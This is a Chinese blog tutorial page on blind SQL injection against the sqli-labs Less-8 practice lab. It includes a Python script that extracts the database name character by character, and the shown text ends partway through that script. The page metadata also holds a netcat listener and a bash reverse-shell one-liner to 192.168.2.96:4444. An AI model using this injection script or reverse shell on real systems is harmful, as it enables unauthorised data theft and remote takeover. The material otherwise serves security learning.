<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="referrer" content="no-referrer" />
  <title>盲注 | 个人博客</title>
  <meta name="keywords" content=" SQL注入 , 布尔注入 , 时间 , 盲注 ">
  <meta name="description" content="盲注 | 个人博客">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="1 将meterpreter获得的权限，反弹到kail上。1.1 kaill监听端口1nc -nvlp 4444 &#x2F;&#x2F;nc是监听软件，4444是监听端口   1.2 meterpreter获取权限后，将权限反弹出来1bash -c &#x27;exec bash -i &amp;&gt;&#x2F;dev&#x2F;tcp&#x2F;192.168.2.96&#x2F;4444 &lt;&amp;1&#x27; &#x2F;&#x2F;将权限反弹到指定ip">
<meta property="og:type" content="article">
<meta property="og:title" content="linux提权">
<meta property="og:url" content="http://example.com/2024/10/11/1%20linux%E7%BB%B4%E6%9D%83%E5%92%8C%E6%8F%90%E6%9D%83/index.html">
<meta property="og:site_name" content="个人博客">
<meta property="og:description" content="1 将meterpreter获得的权限，反弹到kail上。1.1 kaill监听端口1nc -nvlp 4444 &#x2F;&#x2F;nc是监听软件，4444是监听端口   1.2 meterpreter获取权限后，将权限反弹出来1bash -c &#x27;exec bash -i &amp;&gt;&#x2F;dev&#x2F;tcp&#x2F;192.168.2.96&#x2F;4444 &lt;&amp;1&#x27; &#x2F;&#x2F;将权限反弹到指定ip">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584076577-8dc5a9af-4a47-4ab9-b2d0-cbd67a4a686d.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584181405-f6228c06-0936-47c3-904a-4707b55ced4d.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584268726-aee52496-2f22-412a-8d9e-61f9e4e09560.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584463153-c472d14f-6d2e-4b8d-8174-a369c8043590.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584639753-87608500-4599-4b9f-9ea3-a684498c3a6d.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722585283689-67ed8977-1087-471d-ac49-dbbb76fa842e.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584836795-b45026c4-9849-4082-a2cf-b7fefe17e3fa.png">
<meta property="article:published_time" content="2024-10-11T02:34:02.000Z">
<meta property="article:modified_time" content="2024-10-11T03:39:20.574Z">
<meta property="article:author" content="komobyte">
<meta property="article:tag" content="提权">
<meta property="article:tag" content="维权">
<meta property="article:tag" content="linux">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2024/png/46258453/1722584076577-8dc5a9af-4a47-4ab9-b2d0-cbd67a4a686d.png">


<link rel="icon" href="/img/favicon.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 7.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.jpeg"/>
</a>
<div class="author">
    <span>komobyte</span>
</div>

<div class="icon">
    
        
            <a title="rss"
               href="/atom.xml"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-rss"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="github"
               href="https://github.com/yelog"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="facebook"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-facebook"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
            <a title="instagram"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-instagram"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="reddit"
               href="https://www.reddit.com/user/yelog/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-reddit"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="weibo"
               href="http://weibo.com/u/2307534817"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-weibo"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="jianshu"
               href="https://www.jianshu.com/u/ff56736de7cf"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-jianshu"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="zhihu"
               href="https://www.zhihu.com/people/jaytp/activities"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-zhihu"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="oschina"
               href="https://my.oschina.net/yelog"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-oschina"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="email"
               href="mailto:jaytp@qq.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=872336115&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="kugou"
               href="https://www.kugou.com/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-kugou"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="neteasemusic"
               href="https://music.163.com/#/user/home?id=88151013"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-neteasemusic"></use>
                    </svg>
                
            </a>
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="全部文章">全部文章
            
                <small>(15)</small>
            
        </div>
    </li>
    
        
            
                
    <li>
        <div data-rel="内网">
            
            内网
            <small>(1)</small>
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="网安学习">
            
            网安学习
            <small>(10)</small>
        </div>
        
    </li>

            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">关于</a>
        
        <a style="width: 50%"
                
                                           class="friends">友链</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="15">
<input type="hidden" id="yelog_site_word_count" value="9.5k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://komobyte.github.io/">komonyte</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>报错注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>布尔注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>反向代理</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>工具</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>谷歌</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>联合注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>漏洞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>盲注</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>内网</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>内网穿透</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>时间</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>提权</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>维权</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>信息收集</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>信息搜集</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>CVE-2020-0796</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>linux</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>PHP</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>SQL</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>SQL注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>union</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/10/11/1%20linux%E7%BB%B4%E6%9D%83%E5%92%8C%E6%8F%90%E6%9D%83/"
           data-tag="提权,维权,linux"
           data-author="" >
            <span class="post-title" title="linux提权">linux提权</span>
            <span class="post-date" title="2024-10-11 10:34:02">2024/10/11</span>
        </a>
        
        
        <a  class="全部文章 内网 "
           href="/2024/08/14/%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86%EF%BC%88%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%EF%BC%89/"
           data-tag="内网,反向代理,内网穿透"
           data-author="" >
            <span class="post-title" title="内网穿透">内网穿透</span>
            <span class="post-date" title="2024-08-14 20:34:02">2024/08/14</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/3%20MySQL%E5%9F%BA%E7%A1%80/"
           data-tag="SQL"
           data-author="" >
            <span class="post-title" title="MySQL基础">MySQL基础</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/1.%20sql%E6%B3%A8%E5%85%A5%E5%85%A5%E9%97%A8/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="sql注入入门">sql注入入门</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/1%20%E8%B0%B7%E6%AD%8C%E8%AF%AD%E6%B3%95/"
           data-tag="谷歌,信息搜集"
           data-author="" >
            <span class="post-title" title="谷歌语法">谷歌语法</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/2%20%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E5%B7%A5%E5%85%B7/"
           data-tag="信息收集,工具"
           data-author="" >
            <span class="post-title" title="信息收集工具">信息收集工具</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/2%20%E8%81%94%E5%90%88%E6%B3%A8%E5%85%A5/"
           data-tag="SQL注入,联合注入,union"
           data-author="" >
            <span class="post-title" title="联合注入">联合注入</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/3%20%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/"
           data-tag="SQL注入,报错注入"
           data-author="" >
            <span class="post-title" title="报错注入">报错注入</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/23/4.%20%E7%9B%B2%E6%B3%A8/"
           data-tag="SQL注入,布尔注入,时间,盲注"
           data-author="" >
            <span class="post-title" title="盲注">盲注</span>
            <span class="post-date" title="2024-07-23 20:34:02">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/15/2%20PHP%E5%9F%BA%E7%A1%80/"
           data-tag="PHP"
           data-author="" >
            <span class="post-title" title="PHP基础">PHP基础</span>
            <span class="post-date" title="2024-07-15 08:55:02">2024/07/15</span>
        </a>
        
        
        <a  class="全部文章 网安学习 "
           href="/2024/07/12/0.2%E6%B0%B8%E6%81%92%E4%B9%8B%E9%BB%91(CVE-2020-0796)/"
           data-tag="CVE-2020-0796,漏洞"
           data-author="" >
            <span class="post-title" title="永恒之黑漏洞利用">永恒之黑漏洞利用</span>
            <span class="post-date" title="2024-07-12 20:18:48">2024/07/12</span>
        </a>
        
        
        <a  class="全部文章 "
           href="/2024/07/11/0.6%E9%92%93%E9%B1%BC%E5%92%8C%E8%87%AA%E8%A7%A3%E5%8E%8B%E6%8D%86%E7%BB%91%E6%9C%A8%E9%A9%AC%E7%9A%84%E7%BB%BC%E5%90%88/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="钓鱼和自解压捆绑木马综合">钓鱼和自解压捆绑木马综合</span>
            <span class="post-date" title="2024-07-11 19:23:16">2024/07/11</span>
        </a>
        
        
        <a  class="全部文章 "
           href="/2024/07/11/0.5%E8%87%AA%E8%A7%A3%E5%8E%8B%E6%8D%86%E7%BB%91%E6%9C%A8%E9%A9%AC/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="自解压捆绑木马">自解压捆绑木马</span>
            <span class="post-date" title="2024-07-11 19:23:06">2024/07/11</span>
        </a>
        
        
        <a  class="全部文章 "
           href="/2024/07/11/0.4flash%E9%92%93%E9%B1%BC/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="flash钓鱼">flash钓鱼</span>
            <span class="post-date" title="2024-07-11 19:22:55">2024/07/11</span>
        </a>
        
        
        <a  class="全部文章 "
           href="/2024/07/11/03%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C%E5%9F%BA%E7%A1%80%E5%8F%8Anamp%E7%9A%84%E4%BD%BF%E7%94%A8/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="计算机网络基础及hexo使用">计算机网络基础及hexo使用</span>
            <span class="post-date" title="2024-07-11 09:35:30">2024/07/11</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-4. 盲注" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">盲注</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="网安学习">网安学习</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color1">SQL注入</a>
            
            <a class="color5">布尔注入</a>
            
            <a class="color3">时间</a>
            
            <a class="color3">盲注</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2024-07-23 20:45:54'>2024-07-23 20:34</time>
        
    </div>
    <div class="article-meta">
        
        <span>字数:858</span>
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%B8%83%E5%B0%94%E6%B3%A8%E5%85%A5"><span class="toc-text">1 布尔注入</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-1-%E5%B8%83%E5%B0%94%E6%B3%A8%E5%85%A5%E4%BD%BF%E7%94%A8%E6%97%B6%E6%9C%BA"><span class="toc-text">1.1 布尔注入使用时机</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-2-%E5%B8%83%E5%B0%94%E6%B3%A8%E5%85%A5%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0"><span class="toc-text">1.2 布尔注入常用函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-3-%E5%B8%83%E5%B0%94%E6%B3%A8%E5%85%A5%E6%A1%88%E4%BE%8B"><span class="toc-text">1.3 布尔注入案例</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-3-1-%E9%A6%96%E5%85%88%E5%8A%A0%E5%85%A5%E5%8D%95%E5%BC%95%E5%8F%B7"><span class="toc-text">1.3.1 首先加入单引号</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#1-3-2-%E5%B0%86%E5%8D%95%E5%BC%95%E5%8F%B7%E6%B3%A8%E9%87%8A%E6%8E%89%EF%BC%8C%E5%B9%B6%E7%94%A8and-1-2-%E8%BF%9B%E4%B8%80%E6%AD%A5%E9%AA%8C%E8%AF%81%E6%98%AF%E5%90%A6%E5%8F%AF%E4%BB%A5%E5%B8%83%E5%B0%94%E6%B3%A8%E5%85%A5"><span class="toc-text">1.3.2 将单引号注释掉，并用and 1&#x3D;2 进一步验证是否可以布尔注入</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#1-3-3-%E9%80%9A%E8%BF%87substr%E5%92%8Cascii%E6%9D%A5%E9%80%90%E4%B8%AA%E5%88%A4%E6%96%AD"><span class="toc-text">1.3.3 通过substr和ascii来逐个判断</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#1-3-4-%E5%8F%AF%E4%BB%A5%E5%80%9F%E5%8A%A9%E7%88%86%E7%A0%B4%E5%B7%A5%E5%85%B7%EF%BC%8C%E5%B8%AE%E5%8A%A9%E7%8C%9C%E8%A7%A3%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-text">1.3.4 可以借助爆破工具，帮助猜解数据库</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-4-%E8%84%9A%E6%9C%AC"><span class="toc-text">1.4 脚本</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E6%97%B6%E9%97%B4%E6%B3%A8%E5%85%A5"><span class="toc-text">2 时间注入</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#2-1-%E6%97%B6%E9%97%B4%E6%B3%A8%E5%85%A5%E6%97%B6%E6%9C%BA"><span class="toc-text">2.1 时间注入时机</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-2-%E5%87%BD%E6%95%B0"><span class="toc-text">2.2 函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-3-%E5%AE%9E%E4%BE%8B"><span class="toc-text">2.3 实例</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="1-布尔注入"><a href="#1-布尔注入" class="headerlink" title="1 布尔注入"></a>1 布尔注入</h3><h4 id="1-1-布尔注入使用时机"><a href="#1-1-布尔注入使用时机" class="headerlink" title="1.1 布尔注入使用时机"></a>1.1 布尔注入使用时机</h4><ul>
<li>页面没有回显信息和报错信息</li>
<li>页面只有成功和失败两种页面</li>
</ul>
<h4 id="1-2-布尔注入常用函数"><a href="#1-2-布尔注入常用函数" class="headerlink" title="1.2 布尔注入常用函数"></a>1.2 布尔注入常用函数</h4><ul>
<li>substr( )，截取字符串</li>
<li>group_concat( )，将多行多列合并为一行一列</li>
<li>ascii( )，将字符转为ascii值</li>
<li>length()函数，length(string)函数是否返回一个字符串的长度。<br>参数string ：为需要输出其长度的字符串。<br>例：使用length函数判断“qwertyui”长度</li>
</ul>
<h4 id="1-3-布尔注入案例"><a href="#1-3-布尔注入案例" class="headerlink" title="1.3 布尔注入案例"></a>1.3 布尔注入案例</h4><ul>
<li>以sqlilabs的第8关为例</li>
</ul>
<p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258453/1721735058346-a03ec458-4e31-458b-ad83-1107d4557c78.png#averageHue=%23433430&clientId=u92e62b7e-bde4-4&from=paste&height=230&id=ue7d29020&originHeight=316&originWidth=1611&originalType=binary&ratio=1.375&rotation=0&showTitle=false&size=26308&status=done&style=none&taskId=u68dd552d-52e8-475f-aabd-1398b9b025d&title=&width=1171.6363636363637" alt="image.png"></p>
<h5 id="1-3-1-首先加入单引号"><a href="#1-3-1-首先加入单引号" class="headerlink" title="1.3.1 首先加入单引号"></a>1.3.1 首先加入单引号</h5><ul>
<li>页面发生改变且没有报错信息，可以确定考虑bu布尔盲注。</li>
</ul>
<p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258453/1721735154492-2d955aa6-5aba-49f6-ba58-8dd35e01aafe.png#averageHue=%23493833&clientId=u92e62b7e-bde4-4&from=paste&height=215&id=u3f56385f&originHeight=296&originWidth=1825&originalType=binary&ratio=1.375&rotation=0&showTitle=false&size=28758&status=done&style=none&taskId=u612d162e-5454-4a5f-8c7a-b3902856def&title=&width=1327.2727272727273" alt="image.png"></p>
<h5 id="1-3-2-将单引号注释掉，并用and-1-2-进一步验证是否可以布尔注入"><a href="#1-3-2-将单引号注释掉，并用and-1-2-进一步验证是否可以布尔注入" class="headerlink" title="1.3.2 将单引号注释掉，并用and 1&#x3D;2 进一步验证是否可以布尔注入"></a>1.3.2 将单引号注释掉，并用and 1&#x3D;2 进一步验证是否可以布尔注入</h5><ul>
<li>页面错误，说可以布尔注入</li>
</ul>
<p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258453/1721735380453-0e3fd6f0-9860-4b88-8809-ade9dde8fda4.png#averageHue=%23654c45&clientId=u92e62b7e-bde4-4&from=paste&height=159&id=u48c5eb60&originHeight=219&originWidth=1907&originalType=binary&ratio=1.375&rotation=0&showTitle=false&size=29794&status=done&style=none&taskId=u2ef75910-bfec-4e85-aa27-6573cf98459&title=&width=1386.909090909091" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2024/png/46258453/1721735408096-5d009fa7-14fb-449c-af08-4440358185f3.png#averageHue=%2359433d&clientId=u92e62b7e-bde4-4&from=paste&height=183&id=ua9c11a94&originHeight=251&originWidth=1785&originalType=binary&ratio=1.375&rotation=0&showTitle=false&size=27363&status=done&style=none&taskId=ue78d0065-3bd0-4955-b836-1975297cb93&title=&width=1298.1818181818182" alt="image.png"></p>
<h5 id="1-3-3-通过substr和ascii来逐个判断"><a href="#1-3-3-通过substr和ascii来逐个判断" class="headerlink" title="1.3.3 通过substr和ascii来逐个判断"></a>1.3.3 通过substr和ascii来逐个判断</h5><p><img src="https://cdn.nlark.com/yuque/0/2024/png/46258453/1721735667883-b8afd618-6121-494e-9e9d-78dc492215fc.png#averageHue=%23443530&clientId=u92e62b7e-bde4-4&from=paste&height=225&id=u2e96a3bc&originHeight=310&originWidth=1835&originalType=binary&ratio=1.375&rotation=0&showTitle=false&size=36184&status=done&style=none&taskId=ub5118d25-c7f0-421f-aea7-e04389fc0d4&title=&width=1334.5454545454545" alt="image.png"></p>
<h5 id="1-3-4-可以借助爆破工具，帮助猜解数据库"><a href="#1-3-4-可以借助爆破工具，帮助猜解数据库" class="headerlink" title="1.3.4 可以借助爆破工具，帮助猜解数据库"></a>1.3.4 可以借助爆破工具，帮助猜解数据库</h5><ul>
<li>yakit使用双大括号，加int（），数字范围用-来连接，确定爆破范围</li>
</ul>
<h4 id="1-4-脚本"><a href="#1-4-脚本" class="headerlink" title="1.4 脚本"></a>1.4 脚本</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> <span class="type">requests</span></span><br><span class="line"><span class="variable">session</span> <span class="operator">=</span> requests.Session()</span><br><span class="line">url = <span class="string">&quot;http://caichuanqi.cn/lab/sqli-labs-master/Less-8/?id=1&#x27;&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">table_name=<span class="string">&quot;users&quot;</span></span><br><span class="line">#暴库</span><br><span class="line">def <span class="title function_">db</span><span class="params">()</span>:</span><br><span class="line">    name = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">for</span> i in <span class="title function_">range</span><span class="params">(<span class="number">1</span>,<span class="number">50</span>)</span>:</span><br><span class="line">        begin = <span class="number">32</span></span><br><span class="line">        end = <span class="number">128</span></span><br><span class="line">        tmp = (begin + end) <span class="comment">// 2</span></span><br><span class="line">        <span class="keyword">while</span> begin &lt; end:</span><br><span class="line">            paramsPost = <span class="string">&quot;and/**/ascii(substr(database(),&#123;0&#125;,1))&gt;&#123;1&#125;-- -&quot;</span> .format(i,tmp)</span><br><span class="line">            response = session.get(url+paramsPost)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;You are in...........&#x27;</span> in response.text:</span><br><span class="line">                begin = tmp + <span class="number">1</span></span><br><span class="line">                tmp = (begin + end) <span class="comment">// 2</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                end = <span class="type">tmp</span></span><br><span class="line">                <span class="variable">tmp</span> <span class="operator">=</span> (begin + end) <span class="comment">// 2</span></span><br><span class="line">        <span class="keyword">if</span>(tmp==<span class="number">32</span>):</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        name += chr(tmp)</span><br><span class="line">        